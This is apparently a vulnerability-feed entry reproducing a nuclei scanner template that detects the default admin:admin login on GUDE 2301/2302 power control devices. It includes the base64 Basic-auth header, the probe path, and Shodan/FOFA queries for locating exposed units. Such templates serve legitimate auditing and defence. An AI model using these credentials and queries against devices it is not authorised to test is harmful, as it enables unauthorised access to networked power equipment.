gude-default-login: GUDE - Default Login

日期: 2026-02-03 | 影响软件: 未知 | POC: 已公开

漏洞描述

GUDE 2301 and 2302 default administrator login credentials (admin:admin) were detected.

PoC代码[已公开]

id: gude-default-login

info:
  name: GUDE - Default Login
  author: Bretss
  severity: high
  description: GUDE 2301 and 2302 default administrator login credentials (admin:admin) were detected.
  reference:
    - https://media.distrelec.com/Web/Downloads/_m/an/Gude_2302-1_ger_man.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
    shodan-query: http.html:"Expert Net Control"
    fofa-query: body="Expert Net Control"
  tags: gude,default-login

http:
  - method: GET
    path:
      - "{{BaseURL}}/ov.html?"

    headers:
      Authorization: "Basic YWRtaW46YWRtaW4="

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Control Panel")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220504ccf3d1762a9465975fd96a4f6c6246097255281fd1a85ef109b132bb82afa022100e81c412b19e12779813e46492c32058b811bbb1f9565b53fbd7742492cc7eb9d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/gude/gude-default-login.yaml